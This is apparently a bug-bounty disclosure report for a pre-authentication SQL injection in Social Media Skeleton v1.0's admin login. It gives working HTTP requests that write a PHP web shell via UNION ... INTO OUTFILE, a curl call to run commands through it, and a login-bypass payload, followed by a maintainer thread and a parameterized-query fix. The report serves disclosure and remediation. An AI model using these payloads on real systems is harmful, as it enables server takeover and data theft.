Pre-Auth SQLi leading to RCE in Social Media Skeleton v1.0 in fobybus/social-media-skeleton

Valid

Reported on

Aug 1st 2023


Summary

A SQL Injection vulnerability exists in Social Media Skeleton v1.0 via the username and password parameters in admin/login.php. Not to be confused with login.php, which properly escapes special characters.

Issue Description

SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This particular SQLi vulnerability allows UNION based injections, which indirectly leads to RCE.

Improper authorization in a web application undermines its security by exposing sensitive functionalities and resources to unauthorized users. This particular authorization vulnerability allows an unauthorized user to access this resource. Improper authorization is a pervasive problem throughout this application.

The affected script takes a value via a POST request and eventually concatenates it in a SQL query. admin/login.php line 4-5

$uemail=$_POST["email"];
$upass=$_POST["password"];

This value is parsed as an array which can be manipulated to contain a malicious payload sell_return.php lines 8-9

$query="select * from admin where email='$uemail' and password='$upass'";
$result=mysqli_query($dbcon,$query);

Affected URL/Area

<host>/social-media-skeleton/admin/login.php

Risk Rating

  • Risk: HIGH
  • Difficulty to Exploit: LOW

CVSS Justification

Network

The vulnerable component is bound to the network stack. The set of possible attackers extends beyond local attacks, up to and including the entire Internet. This kind of vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the the vulnerable system to carry out an attack.

None

The vulnerable system can be exploited without interaction from any user.

Changed

An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker.

High

There is a total loss of data integrity.

High

There is a total loss of availability.

Steps to reproduce

Attacker makes this request

POST /social-media-skeleton/admin/login.php HTTP/1.1
Host: localhost
Content-Length: 124
Content-Type: application/x-www-form-urlencoded

email=1' UNION SELECT '<?php system($_GET["cmd"]); ?>','','' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' -- &password=anything

Or this request:

POST /social-media-skeleton/admin/login.php HTTP/1.1
Host: localhost
Content-Length: 118
Content-Type: application/x-www-form-urlencoded

email=1&password=1' UNION SELECT '<?php system($_GET["cmd"]); ?>','','' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' --

Should now be able to use the malicious PHP script to execute commands.

curl http://localhost/rce.php?cmd=whoami

Affected Demographic/User Base

Any users of this service for their social media are at risk of having their data stolen, manipulated, or destroyed. The host of this server is at risk of system compromise.

Recommended Fix

Do not pass user controlled data to SQL queries. Use prepared statements or parameterized queries instead.

Note

For the issued CVE ID, please credit Michael Blunt as the discovering researcher. List contact email as michael@mik.bz. The author of this project has been contacted and this information has been shared.

Impact

Attack Scenario

An attacker who finds this system can forge a request to the admin/login.php endpoint and create a malicious PHP file. This PHP file can do anything the attacker wants within the confines of the server settings. This can result in remote code execution (RCE) and full control over the affected resource. Additionally, the attacker can call a reverse shell with the permissions of the user running the webapp.

This is a UNION based injection attack, but more generally in the class of SQL injections: Attackers can use these types of attacks to modify, add, or delete data from the remote database.

The attacker could also use this attack to log in as an administrator with the payload:

username=1' OR '1=1' -- &password=anything

Occurrences

We are processing your report and will contact the fobybus/social-media-skeleton team within 24 hours. 2 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the fobybus/social-media-skeleton team and are waiting to hear back 2 months ago
fobybus gave praise 2 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
fobybus modified the Severity from Critical (10) to Critical (10) 2 months ago
fobybus
2 months ago

Maintainer


Great work @mblunt 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.

fobybus validated this vulnerability 2 months ago
mblunt has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
mblunt
2 months ago

Researcher


Sure thing! I noticed that there were other instances of SQli throughout the codebase so I have updated them to use parameterized queries. Updated files: social-media-skeleton/admin/atask/add.php social-media-skeleton/admin/atask/setting.php social-media-skeleton/admin/login.php social-media-skeleton/tasks/updatels.php

Also a note about mysql_real_escape_string(). It is generally ok, and will prevent most attackers. However, it is not bulletproof. It can be bypassed in some weird edge cases, which is why parameterized queries are recommend practice.

I did not change the exisiting mysql_real_escape_string() in some files, like social-media-skeleton/login.php or social-media-skeleton/signup.php. The current implementation in these files is not vulnerable, but its worth mentioning for a possible improvement.

Hope this helps!

mblunt submitted a
2 months ago
fobybus
2 months ago

Maintainer


Could you make a pull request please !

fobybus marked this as fixed in 1.0.1 with commit 36eb21 2 months ago
mblunt has been awarded the fix bounty
This vulnerability will not receive a CVE
fobybus published this vulnerability 2 months ago
login.php#L8 has been validated
to join this conversation